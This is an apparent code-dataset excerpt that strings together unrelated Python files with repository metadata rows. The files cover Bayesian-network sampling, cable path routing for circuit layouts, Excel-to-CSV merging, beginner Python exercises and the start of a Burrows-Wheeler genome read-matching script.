CPT = [CPT_C, CPT_S, CPT_R, CPT_W]
return [bn, CPT]
def parse(filename):
infile = open(filename, "r")
variables = infile.readline().strip().split(",")
num_samples = infile.readline()
evidences = []
for i in range(len(variables)):
if variables[i] == 'q':
query = i
if variables[i] == 't':
evidences.append([i, 1])
if variables[i] == 'f':
evidences.append([i, 0])
return [query, evidences, num_samples]
def main():
random.seed()
[nb, CPT] = set_the_network()
[query, evidences, num_samples] = parse("inference.txt")
print("Likelihood weighting")
print(query, evidences, num_samples)
prob = wieghted_sampling(nb, CPT, query, evidences, num_samples)
print(prob)
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
19fde128f96d53c76952aab1043ddf4ff57ad868
|
e70ac56109d09a4c323fea4984e2fb29464b0a7f
|
/scripts/test_find_path.py
|
02059ad09220abfcaedc1c1bdb3a075645b1c90f
|
[] |
no_license
|
MatthieuDartiailh/HFSSdrawpy
|
b3542961b564fa3b7721de35f4118d2d78bb87f4
|
9a7e59fc8a90ee5dd85df4319cf6defe108b1904
|
refs/heads/master
| 2020-03-29T09:48:46.196968 | 2018-09-20T15:38:59 | 2018-09-20T15:38:59 | 149,774,962 | 0 | 0 | null | 2018-09-21T14:30:22 | 2018-09-21T14:30:22 | null |
UTF-8
|
Python
| false | false | 29,958 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 12 23:30:42 2018
@author: checkhov
"""
from scripts.designer import Vector
import matplotlib.pyplot as plt
import matplotlib
import numpy as np
plt.close('all')
def move_figure(f, x, y):
"""Move figure's upper left corner to pixel (x, y)"""
backend = matplotlib.get_backend()
if backend == 'TkAgg':
f.canvas.manager.window.wm_geometry("+%d+%d" % (x, y))
elif backend == 'WXAgg':
f.canvas.manager.window.SetPosition((x, y))
else:
# This works for QT and GTK
# You can also use window.setGeometry
f.canvas.manager.window.move(x, y)
plt.show()
def way(vec):
if vec[1] != 0:
if abs(vec[0]/vec[1])<1e-2:
if vec[1]>0:
return Vector(0,1)
elif vec[1]<0:
return Vector(0,-1)
if vec[0] != 0 :
if abs(vec[1]/vec[0])<1e-2:
if vec[0]>0:
return Vector(1,0)
elif vec[0]<0:
return Vector(-1,0)
def equal_float(float1, float2):
if float1!=0:
rel_diff = abs((float1-float2)/float1)
if rel_diff<1e-5:
return True
else:
return False
elif float2!=0:
rel_diff = abs((float1-float2)/float2)
if rel_diff<1e-5:
return True
else:
return False
else:
return True
iIn_pos = Vector([0,0])
iIn_ori = Vector([0, 1])
iOut_pos = Vector([0, 1])
iOut_ori = Vector([0, -1])
start = [iIn_pos+ iIn_ori.orth()*0.05, iIn_pos- iIn_ori.orth()*0.05]
end = [iOut_pos+ iOut_ori.orth()*0.05, iOut_pos- iOut_ori.orth()*0.05]
class Test(object):
def val(self, nb):
return nb
def find_path(self, fillet, is_meander, to_meander, meander_length):
# iIn_pos = self.pos
# iIn_ori = self.ori
# iOut_pos = self.posOut
# iOut_ori = self.oriOut
# print(val(iIn_pos))
# print(val(iIn_ori))
# print(val(iOut_pos))
# print(val(iOut_ori))
point1 = iIn_pos+iIn_ori*1.1*fillet
point2 = iOut_pos+iOut_ori*1.1*fillet
def next_point(point1, point2, vec):
choice1 = point1+vec*(point2-point1).dot(vec)
choice2 = point1+vec.orth()*(point2-point1).dot(vec.orth())
return [[point1, choice1, point2], [point1, choice2, point2]]
points_choices = []
if iIn_ori.dot(iOut_ori)==-1:
middle_point = (point1 + point2)/2
choice_in = next_point(point1, middle_point, iIn_ori) #bon sens
choice_out = next_point(point2, middle_point, iOut_ori) #à inverser
for c_in in choice_in:
for c_out in choice_out:
points_choices.append([iIn_pos, *c_in, *c_out[:-1][::-1], iOut_pos])
else:
choice_in = next_point(point1, point2, iIn_ori)
for c_in in choice_in:
points_choices.append([iIn_pos, *c_in, iOut_pos])
def cost_f(x):
if x==1:
return 0
elif x==0:
return 1
else:
return 100
def check(points):
print(points)
length = 0
prev_point = points[0]
_points = [points[0]]
vecs = []
for point in points[1:]:
if not equal_float(self.val(point)[0], self.val(prev_point)[0]) or not equal_float(self.val(point)[1], self.val(prev_point)[1]):
vec = self.val(point-prev_point)
print(point, prev_point)
print(vec)
length += self.val(vec).norm()
vecs.append(way(vec))
prev_point = point
_points.append(point)
cost = 0
points = _points.copy()
new_points = [points[0]]
print(vecs)
prev_vec = vecs[0]
for ii, vec in enumerate(vecs[1:]):
curr_vec = vec
if curr_vec.dot(prev_vec)==0:
new_points.append(points[ii+1])
added_cost = cost_f(prev_vec.dot(curr_vec))
cost += added_cost
prev_vec = curr_vec
new_points.append(points[-1])
return cost, new_points, length
final_choice= None
cost=np.inf
for ii, choice in enumerate(points_choices):
new_cost, new_choice, new_length = check(choice)
if new_cost<cost:
final_choice = new_choice
cost = new_cost
length = new_length
length_fillet = length - cost*(2-np.pi/2)*fillet
n_fillet = 10
dist_fillet = length_fillet/n_fillet
float_final_choice = []
for point in final_choice:
float_final_choice.append(self.val(point))
def working_points(points, min_dist, to_meander):
min_dist = min_dist*1.1
working_p_start = []
working_p_end = []
left_p_start=[points[0]]
left_p_end=[points[-1]]
success=False
index_start = 0
for ii, point in enumerate(points[1:]):
A = left_p_start[-1]
B = point
AB = B-A
vec = way(self.val(B-A))
if self.val(AB).norm() > self.val(min_dist):
working_p_start.append(A+vec*min_dist/2)
success = True
index_start = ii+1
break
else:
left_p_start.append(B)
to_meander.pop(0)
if not success:
print('Warning: Could not find points to elongate cable %s' %self.name)
left_p = left_p_start+left_p_end[::-1]
return [], left_p, 0
else:
success=False
index_end = 0
for ii, point in enumerate(points[::-1][1:]):
A = left_p_end[-1]
B = point
AB = B-A
vec = way(self.val(B-A))
if self.val(AB).norm() > self.val(min_dist):
working_p_end.append(A+vec*min_dist/2)
success = True
index_end = ii+1
break
else:
left_p_end.append(B)
to_meander.pop(-1)
if not success:
print('Warning: Could not find points to elongate cable %s' %self.name)
left_p = left_p_start+left_p_end[::-1]
return [], left_p, 0
working_p = working_p_start+points[index_start:-index_end]+working_p_end
index_insertion = len(left_p_start)
left_p = left_p_start+left_p_end[::-1]
return working_p, left_p, index_insertion
def right_left(points):
vecs = []
A = points[0]
for B in points[1:]:
vecs.append(way(self.val(B-A)))
A=B
# print(points)
# print(vecs)
vecA = vecs[0]
r_l = [0]
for vecB in vecs[1:]:
r_l.append(vecA.cross(vecB))
vecA=vecB
r_l.append(0)
return r_l
def add_points(points, rl, min_dist, n_meander):
min_dist = min_dist*1.1
n_points = len(points)
A = points[0]
new_points =[]
if n_points==2:
new_points.append(A)
B=points[-1]
vec = way(self.val(B-A))
AB = (B-A).norm()
n_add = int(self.val(AB/min_dist))
if rl[0]*rl[1]==1 and n_add%2==0:
n_add-=1
if rl[0]*rl[1]==-1 and n_add%2==1:
n_add-=1
if n_meander==-1 or n_meander>=n_add:
dist = AB/n_add
ignore=False
elif n_meander<n_add:
n_add=n_meander
centerAB=(A+B)/2
addedA=centerAB-vec*n_add/2*min_dist
addedB=centerAB+vec*n_add/2*min_dist
dist=min_dist
A=addedA
new_points.append(addedA)
ignore=True
new_points+=[A+vec*dist/2]
new_points+=[A+vec*dist*(jj+1+1/2) for jj in range(n_add-1)]
rl=None
indices_corners=None
# else:
# indices_corners=[]
# rl = right_left(points)
#
# for ii, B in enumerate(points[1:]):
# new_points.append(A)
# vec = way(self.val(B-A))
# AB = (B-A).norm()
# if ii==0 or ii==n_points-2:
# factor = 0.5
# else:
# factor = 1
# n_add = int(self.val(AB/min_dist)-factor)
# if not(ii==0 or ii==n_points-2):
# if rl[ii-1]*rl[ii]==-1 and n_add%2==1:
# n_add-=1
# if rl[ii-1]*rl[ii]==1 and n_add%2==0:
# n_add-=1
#
# dist = AB/(n_add+factor)
# if n_add>=1:
# if ii==0:
# new_points+=[A+vec*dist/2]
# new_points+=[A+vec*dist*(jj+1+1/2) for jj in range(n_add-1)]
# elif ii!=n_points-2:
# new_points+=[A+vec*dist*(jj+1) for jj in range(n_add)]
# else:
# new_points+=[A+vec*dist*(jj+1) for jj in range(n_add)]
# indices_corners.append(len(new_points))
# A=B
# indices_corners= indices_corners[:-1]
if ignore:
new_points.append(addedB)
new_points.append(points[-1])
return new_points, indices_corners, dist, ignore
def displace(points, rl, min_dist, displacement=0, n_meander=-1):
if self.val(displacement)<self.val(min_dist)*1.1:
displacement = min_dist*1.1
print(n_meander)
points, indices_corners, dist, ignore = add_points(points, rl, min_dist, n_meander=n_meander)
print(points)
print(dist)
new_points = [points[0]]
parity = 1
if indices_corners is not None:
for ii, B in enumerate(points[1:-1]):
A = points[ii]
AB= B-A
vec = way(self.val(AB))
if ii==0:
parity = (-2*((indices_corners[0]-(ii+1))%2)+1)*(-rl[0])
else:
parity = -parity
if ii+1 not in indices_corners:
#regular point
new_points[ii+1] = points[ii+1]+vec.orth()*parity*min_dist
else:
new_points[ii+1] = points[ii+1]+(vec.orth()*parity+vec).unit()*min_dist
else:
if rl[0]!=0:
parity = -rl[0]
else:
parity = (2*(len(points)%2)-1) * (-rl[1]*(rl[1]+1)+1)
print('rl '+str(-rl[1]*(rl[1]+1)+1))
print(ignore)
if ignore:
n_ignore=2
new_points.append(points[1])
else:
n_ignore=1
for ii, B in enumerate(points[n_ignore:-n_ignore]):
A=points[ii]
AB=B-A
vec=way(self.val(AB))
new_points.append(points[ii+n_ignore]+vec.orth()*parity*displacement-vec*dist/2)
new_points.append(points[ii+n_ignore]+vec.orth()*parity*displacement+vec*dist/2)
parity = -parity
print(points[ii+n_ignore])
if ignore:
new_points.append(points[-2])
new_points.append(points[-1])
return new_points
def meander(points, min_dist, to_meander, meander_length): # to_meander is list of segments to be meander
n_points = len(points)
n_to_meander = len(to_meander)
if n_points-1>n_to_meander:
to_meander = to_meander+[0 for ii in range(n_points-1-n_to_meander)]
else:
to_meander = to_meander[:n_points-1]
working_p, left_p, index_insertion = working_points(points, min_dist, to_meander)
if len(working_p) != 0:
rl = right_left(working_p)
working_ps = []
for ii, isit in enumerate(to_meander):
print(isit)
if isit!=0:
print('calling displace')
new_working_p = displace(working_p[ii:ii+2], rl[ii:ii+2], min_dist, displacement = meander_length, n_meander=isit) # n_meander=-1 -> auto
else:
new_working_p = working_p[ii:ii+2]
working_ps += new_working_p
# print(working_ps)
left_p[index_insertion:index_insertion] = working_ps
return left_p#left_p#,
if is_meander:
min_dist = 2*fillet
final_choice = meander(final_choice, min_dist, to_meander, meander_length)
# Needed to draw Manu bond
def add_fillet_points(points, fillet):
new_points = [points[0]]
for ii, point in enumerate(points[1:-1]):
index = ii+1
p_vec = points[index-1]-point
n_vec = points[index+1]-point
new_points.append(point+way(self.val(p_vec))*fillet)
new_points.append(point+way(self.val(n_vec))*fillet)
new_points.append(points[-1])
return new_points
# new_points = add_fillet_points(final_choice, fillet)
# for ii, point in enumerate(new_points[::2]):
# self.draw('bef_test', [new_points[2*ii], new_points[2*ii+1]], closed=False)
# self.to_bond.append([new_points[2*ii], new_points[2*ii+1]])
# self.draw('test', new_points, closed=False)
# Needed for equidistant fillet
#
#
#
#
def dist(points, A, B, fillet): # A and B are integer point indices
if A<0 or A>=len(points):
raise ValueError('First index should be within the point list')
if B<0 or B>=len(points):
raise ValueError('Second index should be within the point list')
if A==B:
return 0
if abs(A-B)==1:
if A<B:
if A%2==1:
return fillet*np.pi/2
else:
return (points[A]-points[B]).norm()
else:
return dist(points, B, A, fillet)
if abs(A-B)>1:
if A<B:
return dist(points, A, B-1, fillet) + dist(points, B-1, B, fillet)
else:
return dist(points, B, A, fillet)
def where(points, length, fillet):
n_points = len(points)
for ii in range(n_points-1):
distance = dist(points, ii, ii+1, fillet)
if length <= distance:
if ii%2==0:
kind = 'normal'
else:
kind = 'fillet'
return [ii, ii+1], kind, length
else:
length = length-distance
raise ValueError('Length should be smaller than cable length')
def return_bonds(points, fillet, length_fillet, n_fillet): #lengh_fillet is the cable lenght with filleting taken into account
# create bond at half dist_fillet
prev_ori = way(self.val(points[1]-points[0]))
unit_dist_fillet = length_fillet/n_fillet
dist_fillet = unit_dist_fillet/2 #starting dist for the fillet
for ii in range(n_fillet):
indices, kind, remain = where(points, dist_fillet, fillet)
A = points[indices[0]]
B = points[indices[1]]
if kind=='normal':
pos = A + remain*(B-A).unit()
ori = way(self.val(B-A))
width = 0.0004
self.draw_wirebond('wire', pos, ori, width)
prev_ori = ori
else:
next_ori=way(self.val(points[indices[1]+1]-B)) #should be fine, if we have a fillet we have some straight portion after
print(f'kind={kind}')
ex = next_ori
ey = prev_ori
print(f'ex={ex}')
print(f'ey={ey}')
pos_center = A + ex*(B-A).dot(ex)
print(pos_center)
theta = remain/fillet
print(theta*180/np.pi)
pos = pos_center - ex*np.cos(theta)*fillet + ey * np.sin(theta)*fillet
print(f'pos={pos}')
ori = ey*np.cos(theta) + ex*np.sin(theta)
print(f'ori={ori}')
width = 0.0004
self.draw_wirebond('wire', pos, ori, width)
dist_fillet += unit_dist_fillet
_, final_choice, _ = check(final_choice)
to_bond_points = add_fillet_points(final_choice, fillet)
for ii, point in enumerate(to_bond_points[::2]):
# self.draw('bef_test', [to_bond_points[2*ii], to_bond_points[2*ii+1]], closed=False)
# self.to_bond.append([to_bond_points[2*ii], to_bond_points[2*ii+1]])
pass
# to_bond_points= final_choice
return final_choice, to_bond_points
dummy = Test()
meander, to_bond_points = dummy.find_path(fillet=0.1, is_meander=True, to_meander=[1,0,0,1,1,0,1], meander_length=0.3)
fig, ax = plt.subplots(figsize = (6,12))
#for ii, meander in enumerate(meanders):
ax.plot(np.array(start).T[0],np.array(start).T[1], color='red')
ax.plot(np.array(end).T[0],np.array(end).T[1], color='red')
ax.plot(np.array(meander).T[0],np.array(meander).T[1], 'o-')
for ii, point in enumerate(to_bond_points[:-2][::2]):
ax.plot([to_bond_points[2*ii+1][0], to_bond_points[2*ii+2][0]],[to_bond_points[2*ii+1][1], to_bond_points[2*ii+2][1]], color='g')
#ax.axis('equal')
ax.set_xlim((-0.5,1.5))
ax.set_ylim((-0.5,1.5))
move_figure(fig, -1000, 10)
#
#points_fromIn = [iIn_pos]
#points_fromOut = [iOut_pos]
#point1 = iIn_pos+iIn_ori*0.1
#point2 = iOut_pos+iOut_ori*0.1
#
#
#
#
#
#
#def next_point(point1, point2, vec):
# choice1 = point1+(point2-point1).dot(vec)*vec
# choice2 = point1+(point2-point1).dot(vec.orth())*vec.orth()
# return [[point1, choice1, point2], [point1, choice2, point2]]
#
#
#points_choices = []
#if iIn_ori.dot(iOut_ori)==-1:
# middle_point = (point1 + point2)/2
#
# choice_in = next_point(point1, middle_point, iIn_ori) #bon sens
# choice_out = next_point(point2, middle_point, iOut_ori) #à inverser
## print(choice_in)
## print(choice_out)
# for c_in in choice_in:
# for c_out in choice_out:
# points_choices.append([iIn_pos, *c_in, *c_out[:-1][::-1], iOut_pos])
#else:
# choice_in = next_point(point1, point2, iIn_ori)
# for c_in in choice_in:
# points_choices.append([iIn_pos, *c_in, iOut_pos])
#
#
#def cost_f(x):
# if abs(x-1)<1e-2:
# return 0
# elif abs(x)<1e-2:
# return 1
# else:
# return 100
#
#def check(points):
# points_array = np.array(points)
# vecs = points_array[:-1]-points_array[1:]
#
# cost = 0
# prev_vec = Vector(vecs[0]).unit()
# new_points=[]
# new_points.append(points[0])
# for ii, vec in enumerate(vecs[1:]):
# curr_vec = Vector(vec).unit()
# if curr_vec.dot(prev_vec)==0:
# new_points.append(points[ii+1])
# added_cost = cost_f(prev_vec.dot(curr_vec))
# cost += added_cost
# prev_vec = curr_vec
# new_points.append(points[-1])
# return cost, new_points
#
#final_choice= None
#cost=np.inf
#for choice in points_choices:
# new_cost, new_points = check(choice)
# if new_cost<cost:
# final_choice = new_points
# cost = new_cost
#
#
#
############
##def relative_append(A, vector_list):
## new_vector_list = [A+vector_list[0]]
## for vector in vector_list[1:]:
## new_vector_list.append(new_vector_list[-1]+vector)
## return new_vector_list
##
##def build_meander_list(fillet, vec, n_vec, n):
## if n==0:
## return [vec*fillet].extend(build_meander_list).extend([vec*fillet])
## if n>0:
## if n%2=0:
## return build_meander_list(fillet, vec, n_vec, n-1)
## else:
## return build_meander_list(fillet, vec, -n_vec, n-1)
##
##fillet=0.1
##min_width = 4*fillet
##min_offset = 4*fillet*(np.pi/2-1) #off
##def meander(points, index, number, kind): #index = index segment on which you would like to make meanders
## #kind will be start, middle, end
## n_points = len(points)
## A = points[index]
## B = points[index+1]
## AB = B-A
## vec = way(AB)
## if index==0:
## prev_vec=None
## next_vec = way(points[index+2]-B) # we assume we have at least one corner
## points_to_append = relative_append(A, [vec*fillet, -next_vec*2*fillet, vec*2*fillet, next_vec*2*fillet, vec*fillet])
## points[index+1:index+1] = points_to_append
## elif index==n_points-1:
## prev_vec = way(A-points[index-1])
## next_vec=None
## else:
## prev_vec = way(A-points[index-1])
## next_vec = way(points[index+2]-B)
############
#
##def working_points(points, min_dist, to_meander):
## min_dist = min_dist*1.1
## working_p_start = []
## working_p_end = []
## left_p_start=[points[0]]
## left_p_end=[points[-1]]
## success=False
## index_start = 0
## for ii, point in enumerate(points[1:]):
## A = left_p_start[-1]
## B = point
## AB = B-A
## vec = way(B-A)
## if AB.norm() > min_dist:
## working_p_start.append(A+vec*min_dist/2)
## success = True
## index_start = ii+1
## break
## else:
## left_p_start.append(B)
## to_meander.pop(0)
##
##
## if not success:
## raise ValueError('Could not find points to elongate cable')
##
## success=False
## index_end = 0
## for ii, point in enumerate(points[::-1][1:]):
## A = left_p_end[-1]
## B = point
## AB = B-A
## vec = way(B-A)
## if AB.norm() > min_dist:
## working_p_end.append(A+vec*min_dist/2)
## success = True
## index_end = ii+1
## break
## else:
## left_p_end.append(B)
## to_meander.pop(-1)
##
## if not success:
## raise ValueError('Could not find points to elongate cable')
##
## working_p = working_p_start+points[index_start:-index_end]+working_p_end
## index_insertion = len(left_p_start)
## left_p = left_p_start+left_p_end[::-1]
##
## return working_p, left_p, index_insertion
##
##def right_left(points):
## vecs = []
## A = points[0]
## for B in points[1:]:
## vecs.append(way(B-A))
## A=B
### print(points)
### print(vecs)
## vecA = vecs[0]
## r_l = [0]
## for vecB in vecs[1:]:
## r_l.append(vecA.cross(vecB))
## vecA=vecB
## r_l.append(0)
## return r_l
##
##def add_points(points, rl, min_dist):
## min_dist = min_dist*1.1
## n_points = len(points)
## print(n_points)
## A = points[0]
## new_points =[]
## if n_points==2:
## new_points.append(A)
## B=points[-1]
## vec = way(B-A)
## AB = (B-A).norm()
## n_add = int(AB/min_dist)
## if rl[0]*rl[1]==1 and n_add%2==0:
## n_add=-1
## if rl[0]*rl[1]==-1 and n_add%2==1:
## n_add-=1
## dist = AB/n_add
## new_points+=[A+vec*dist/2]
## new_points+=[A+vec*dist*(jj+1+1/2) for jj in range(n_add-1)]
## rl=None
## indices_corners=None
## else:
## indices_corners=[]
## rl = right_left(points)
### print(rl)
## for ii, B in enumerate(points[1:]):
## new_points.append(A)
## vec = way(B-A)
## AB = (B-A).norm()
## if ii==0 or ii==n_points-2:
## factor = 0.5
## else:
## factor = 1
## n_add = int(AB/min_dist-factor)
## if not(ii==0 or ii==n_points-2):
## if rl[ii-1]*rl[ii]==-1 and n_add%2==1:
## n_add-=1
## if rl[ii-1]*rl[ii]==1 and n_add%2==0:
## n_add-=1
## print(n_add)
## dist = AB/(n_add+factor)
## if n_add>=1:
## if ii==0:
## new_points+=[A+vec*dist/2]
## new_points+=[A+vec*dist*(jj+1+1/2) for jj in range(n_add-1)]
## elif ii!=n_points-2:
## new_points+=[A+vec*dist*(jj+1) for jj in range(n_add)]
## else:
## new_points+=[A+vec*dist*(jj+1) for jj in range(n_add)]
## indices_corners.append(len(new_points))
## A=B
## indices_corners= indices_corners[:-1]
## new_points.append(points[-1])
## return new_points, indices_corners, dist
##
##def displace(points, rl, min_dist, displacement=0):
## if displacement<min_dist:
## displacement = min_dist*1.1
## points, indices_corners, dist = add_points(points, rl, min_dist)
## new_points = [points[0]]
## parity = 1
## if indices_corners is not None:
## for ii, B in enumerate(points[1:-1]):
## A = points[ii]
## AB= B-A
## vec = way(val(AB))
## if ii==0:
## parity = (-2*((indices_corners[0]-(ii+1))%2)+1)*(-rl[0])
## else:
## parity = -parity
## print(parity)
## if ii+1 not in indices_corners:
## #regular point
## new_points[ii+1] = points[ii+1]+vec.orth()*parity*min_dist
## else:
## new_points[ii+1] = points[ii+1]+(vec.orth()*parity+vec).unit()*min_dist
## else:
## if rl[0]!=0:
## parity = -rl[0]
## print(f'parity{parity}')
## else:
## parity = (2*(len(points)%2)-1) * (-rl[1])
## print(f'parity{parity}')
## for ii, B in enumerate(points[1:-1]):
## A=points[ii]
## AB=B-A
## vec=way(val(AB))
## new_points.append(points[ii+1]+vec.orth()*parity*displacement-vec*dist/2)
## new_points.append(points[ii+1]+vec.orth()*parity*displacement+vec*dist/2)
## parity = -parity
## new_points.append(points[-1])
##
##
## return new_points
##
##def meander(points, min_dist, to_meander): # to_meander is list of segments to be meander
## n_points = len(points)
## n_to_meander = len(to_meander)
## if n_points-1>n_to_meander:
## to_meander = to_meander+[0 for ii in range(n_points-1-n_to_meander)]
## else:
## to_meander = to_meander[:n_points-1]
##
## working_p, left_p, index_insertion = working_points(points, min_dist, to_meander)
### print(working_p, left_p, index_insertion)
## rl = right_left(working_p)
## print(to_meander)
## working_ps = []
## for ii, isit in enumerate(to_meander):
## print(ii, isit)
## if isit==1:
## new_working_p = displace(working_p[ii:ii+2], rl[ii:ii+2], min_dist, displacement = min_dist)
## else:
## new_working_p = working_p[ii:ii+2]
## working_ps += new_working_p
##
## left_p[index_insertion:index_insertion] = working_ps
## return left_p#, working_p
##
##
##fillet=0.07
##
##min_dist = 2*fillet
##
###print(final_choice)
##meander = meander(final_choice, min_dist, [0,1,0,5,2,3])
###print(meanders)
#
#
|
[
"[email protected]"
] | |
8db4ec350f45cf94a390fca48b4644c9f2306e89
|
0924e375fa206ae1385fc5a9e44a11bdaf7503cc
|
/t_one.py
|
a444629a3ab7c26f80f8d8b8de7abf24bf418664
|
[] |
no_license
|
heisenberg967/Web_scrap
|
eb9dc92afc25924ae2bec693ccd51a43504dc3ec
|
79a3a70e68d836ce5bf3e1770bc600f671b91d0d
|
refs/heads/master
| 2021-01-25T12:49:45.508348 | 2018-03-02T05:18:41 | 2018-03-02T05:18:41 | 123,516,925 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 439 |
py
|
import glob
import xlrd
import csv
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
xlfiles=glob.glob('D:/Work/Datascience Intern/*.xlsx')
wf = csv.writer(open('D:/Work/Datascience Intern/one.csv','wb'),delimiter=',')
for files in xlfiles:
#print files
workbook = xlrd.open_workbook(files)
sheet = workbook.sheet_by_index(0)
for row in range(1,sheet.nrows):
#print sheet.row_values(row)
wf.writerow(sheet.row_values(row))
|
[
"[email protected]"
] | |
2b67e173c250d907b9ddc4dcbd41582893e80591
|
3933f83fb99f51e01313df27e018a767e26733da
|
/mypython/python练习/变量练习.py
|
ca897e9c3844f647696f31df60427115fc214154
|
[] |
no_license
|
Jacktting/mygit
|
5af7f2f8d80d5113ad68e26bcdf0df14c00fa411
|
fbc3970e817b0eb9080d713e63d55acb6b05d963
|
refs/heads/master
| 2021-03-14T04:50:19.979139 | 2020-05-15T08:25:01 | 2020-05-15T08:25:01 | 246,737,896 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 691 |
py
|
"""
将华氏温度转换为摄氏温度
"""
f = float(input('请输入华氏温度: '))
c = (f - 32) / 1.8
print('%.1f华氏度 = %.1f摄氏度' % (f, c))
"""
输入半径计算圆的周长和面积
"""
import math
radius = float(input('请输入圆的半径: '))
L = 2 * math.pi * radius
area = math.pi * radius * radius
print('周长: %.2f' % L)
print('面积: %.2f' % area)
"""
输入年份 如果是闰年输出True 否则输出False
"""
year = int(input('请输入年份: '))
# 如果代码太长写成一行不便于阅读 可以使用\对代码进行折行
is_leap = (year % 4 == 0 and year % 100 != 0) or \
year % 400 == 0
print(is_leap)
|
[
"[email protected]"
] | |
5c60eef6a651955717d98205494abf3883dce4ee
|
68e7424ef0c78eb773c6b8b858956c8d403099de
|
/Burrow-Wheelers-Transform-Genome-String-Match/sequence_partial_match_detect.py
|
d199d7a46e3ed7da41ae2b83e17289a93a55ffeb
|
[] |
no_license
|
ShubhaShedthikere/Data-Analytics
|
04e20e869579c053601f68e1b29e258e359ebb86
|
e122a3939b91cdda3c05bb420154c8905d8101b4
|
refs/heads/master
| 2021-01-13T13:08:13.658685 | 2016-11-04T14:13:10 | 2016-11-04T14:13:10 | 72,741,825 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 14,851 |
py
|
import numpy as np
import Band as bd
import re
#-------------------------------------------------------------------------------------
#Input Parameters and other input information
exonsBinPositions={149249758:149249869, \
149256128:149256424, \
149258413:149258581, \
149260049:149260214, \
149261769:149262008, \
149264291:149264401, \
149293259:149293555,\
149295543:149295711,\
149297179:149297344,\
149298899:149299138}
readsFileName="reads.txt"
chromosomeFileName=""
#bwtLastColFileName="sampleBWTCol.txt"
bwtLastColFileName="chrX_last_col.txt"
bwtRefFileName="chrX_map.txt"
#bwtRefFileName="sampleBWTRef.txt"
numOfAllowedMismatches=2
numOfCharPerLineBWT=100
numOfLinesSkippedReadSave=100
#-------------------------------------------------------------------------------------
# Global Variables
bwtCol=[]
ACGTBin=[]
ReadMatrixSave=[]
totCountEach=np.zeros(4).astype(int)
firstColStartIndex=np.zeros(4).astype(int)
exonBinReadsCount={}
mapDict=dict({"A":0,"C":1,"G":2,"T":3})
#-------------------------------------------------------------------------------------
# read the BWT last column and create a matrix of cumulative sum
def ReadBWT(bwtLastColFileName,bwtRefFileName):
global bwtCol
global ACGTBin
global ReadMatrixSave
global totCountEach
global bwtRef
global firstColStartIndex
# Load the binary version of the BWT column
linecount=0
print "Loading BWT last column.............."
with open(bwtLastColFileName) as fhand:
for line in fhand:
text=line
#print text
totCountEach[mapDict["A"]]=totCountEach[mapDict["A"]]+line.count("A")
totCountEach[mapDict["C"]]=totCountEach[mapDict["C"]]+line.count("C")
totCountEach[mapDict["G"]]=totCountEach[mapDict["G"]]+line.count("G")
totCountEach[mapDict["T"]]=totCountEach[mapDict["T"]]+line.count("T")
if linecount%numOfLinesSkippedReadSave==0:
ReadMatrixSave.append(list(totCountEach))
bwtCol.append(text.replace("\n",""))
linecount=linecount+1
# print "totCountEach",totCountEach
# print "Num of elements=",len(bwtCol)
# print "ReadMatrixSave=",ReadMatrixSave
#--------------------------------------------------------------------------------------
#It takes the start index, end index and the character of a band of bwt columns
# and returns a binary string of that band which has 1 where the character is
# is present, else 0
def OccuranceFetch(startIndex,endIndex,character):
#print "Inside OccuranceFetch....."
ACGTFetchStartIndex=startIndex/numOfCharPerLineBWT
#print "startIndex=",startIndex,"endIndex=",endIndex
remStart=startIndex%numOfCharPerLineBWT
#print "remStart",remStart
ACGTFetchEndIndex=endIndex/numOfCharPerLineBWT
remEnd=endIndex%numOfCharPerLineBWT
numOfOccurances=0
firstIndex=-1
lastIndex=-1
#print "ACGTFetchStartIndex=",ACGTFetchStartIndex
#print "ACGTFetchEndIndex=",ACGTFetchEndIndex
for i in range(ACGTFetchStartIndex,ACGTFetchEndIndex+1):
#print "i=",i,"bwtCol[i]",bwtCol[i]
if (ACGTFetchStartIndex==ACGTFetchEndIndex):
numOfOccurances= bwtCol[i].count(character,remStart,remEnd+1)
if numOfOccurances!=0:
firstIndex=i*numOfCharPerLineBWT+bwtCol[i].find(character,remStart,remEnd+1)
lastIndex=i*numOfCharPerLineBWT+bwtCol[i].rfind(character,remStart,remEnd+1)
else:
if i==ACGTFetchStartIndex:
numOfOccurances=numOfOccurances+\
bwtCol[i].count(character,remStart)
if numOfOccurances!=0:
firstIndex=i*numOfCharPerLineBWT+bwtCol[i].find(character,remStart)
elif i==ACGTFetchEndIndex:
numOfOccurances=numOfOccurances+\
bwtCol[i].count(character,0,remEnd+1)
if firstIndex==-1 and numOfOccurances!=0:
firstIndex=i*numOfCharPerLineBWT+bwtCol[i].find(character,0,remEnd+1)
else:
numOfOccurances=numOfOccurances+\
bwtCol[i].count(character)
if firstIndex==-1 and numOfOccurances!=0:
firstIndex=i*numOfCharPerLineBWT+bwtCol[i].find(character)
for i in range(ACGTFetchEndIndex,ACGTFetchStartIndex-1,-1):
if (ACGTFetchEndIndex!=ACGTFetchStartIndex):
if i==ACGTFetchEndIndex and bwtCol[i].count(character,0,remEnd+1)!=0 \
and lastIndex==-1:
lastIndex=i*numOfCharPerLineBWT+bwtCol[i].rfind(character,0,remEnd+1)
elif i== ACGTFetchStartIndex and bwtCol[i].count(character,remStart)!=0 \
and lastIndex==-1:
lastIndex=i*numOfCharPerLineBWT+bwtCol[i].rfind(character,remStart)
else:
if lastIndex==-1 and bwtCol[i].count(character)!=0:
lastIndex=i*numOfCharPerLineBWT+bwtCol[i].rfind(character)
#print "firstIndex=",firstIndex,"lastIndex=",lastIndex,"numOfOccurances",numOfOccurances
return firstIndex,lastIndex,numOfOccurances
#--------------------------------------------------------------------------------------
#Rank query
def RankQuery(character,rowIndex):
#print "Inside rank query........"
CharOffset=rowIndex%numOfCharPerLineBWT
BwtColLineNum=rowIndex/numOfCharPerLineBWT
LineOffset=BwtColLineNum%numOfLinesSkippedReadSave
ReadSaveIndex=rowIndex/(numOfLinesSkippedReadSave*numOfCharPerLineBWT)
#print "LineOffset",LineOffset,"ReadSaveIndex",ReadSaveIndex
#print "BwtColLineNum",BwtColLineNum,"CharOffset",CharOffset
#print ReadMatrixSave[ReadSaveIndex]
if LineOffset==0 :
if CharOffset==9:
return ReadMatrixSave[ReadSaveIndex][mapDict[character]]-1
else:
startIndex=rowIndex+1
